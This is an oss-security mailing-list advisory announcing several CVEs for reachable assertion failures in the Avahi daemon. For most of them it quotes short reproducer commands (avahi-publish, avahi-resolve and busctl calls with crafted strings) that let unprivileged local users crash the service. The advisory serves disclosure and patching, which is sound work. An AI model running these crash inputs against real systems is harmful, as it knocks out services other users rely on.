|
Message-ID: <91be5904-210a-4e21-aa50-e77a41304a1f@oracle.com> Date: Fri, 6 Oct 2023 14:19:17 -0700 From: Alan Coopersmith <alan.coopersmith@...cle.com> To: oss-security@...ts.openwall.com Subject: CVEs assigned for reachable assertions in avahi While the CVE database still shows them as reserved, Red Hat's & Debian's trackers show several CVE's being assigned for client requests that can cause the Avahi server to abort with an assertion failure. Only one of them has a fix available so far. ---------------------------------------------------------------------------- CVE-2023-38469: https://github.com/lathiat/avahi/issues/455 Reachable assertion in avahi_dns_packet_append_record "It can be triggered by unprivileged local users (unless disable-user-service-publishing is set to yes explicitly): avahi-publish -s T _qotd._tcp 22 $(perl -le 'print "A " x 100000')" ---------------------------------------------------------------------------- CVE-2023-38470: https://github.com/lathiat/avahi/issues/454 Reachable assertion in avahi_escape_label "avahi-resolve -n ',.=.}.=.?-.}.=.?.?.}.}.?.?.?.z.?.?.}.}.}.?.?.?.r.=.=.}.=.?.}}.}.?.?.?.zM.=.=.?.?.}.}.?.?.}.}.}.?.?.?.r.=.=.}.=.?.}}.}.?.?.?.zM.=.=.?.?.}.}.?.?.?.zM.?`?.}.}.}.?.?.?.r.=.?.}.=.?.?.}.?.?.?.}.=.?.?.}??.}.}.?.?.?.z.?.?.}.}.}.?.?.?.r.=.=.}.=.?.}}.}.?.?.?.zM.?`?.}.}.}.??.?.zM.?`?.}.}.}.?.?.?.r.=.?.}.=.?.?.}.?.?.?.}.=.?.?.}??.}.}.?.?.?.z.?.?.}.}.}.?.?.?.r.=.=.}.=.?.}}.}.?.?.?.zM.?`?.}.}.}.?.?.?.r.=.=.?.?`.?.?}.}.}.?.?.?.r.=.?.}.=.?.?.}.?.?.?.}.=.?.?.}'" Fix: https://github.com/lathiat/avahi/commit/94cb6489114636940ac683515417990b55b5d66c ---------------------------------------------------------------------------- CVE-2023-38471: https://github.com/lathiat/avahi/issues/453 Reachable assertion in dbus_set_host_name "It can be triggered by unprivileged local users unless 1c599d8 is backported. busctl call org.freedesktop.Avahi / org.freedesktop.Avahi.Server2 SetHostName "s" 'A\.B'" ---------------------------------------------------------------------------- CVE-2023-38472: https://github.com/lathiat/avahi/issues/452 Reachable assertion in avahi_rdata_parse "It can be reproduced by calling something like org.freedesktop.Avahi /Client*/EntryGroup* org.freedesktop.Avahi.EntryGroup AddRecord "iiusqquay" 0 0 0 '' 0 0 0 0 using avahi_entry_group_add_record (group, AVAHI_IF_UNSPEC, AVAHI_PROTO_UNSPEC, 0, "Test", 0x01, 0x10, 120, "", 0) from inside a client creating EntryGroups. It can be triggered by unprivileged users unless disable-user-service-publishing is set to yes explicitly. By default it's set to no." ---------------------------------------------------------------------------- CVE-2023-38473: https://github.com/lathiat/avahi/issues/451 Reachable assertion in avahi_alternative_host_name "busctl call org.freedesktop.Avahi / org.freedesktop.Avahi.Server GetAlternativeHostName "s" ').'" -- -Alan Coopersmith- alan.coopersmith@...cle.com Oracle Solaris Engineering - https://blogs.oracle.com/solaris
Powered by blists - more mailing lists
Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.
Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.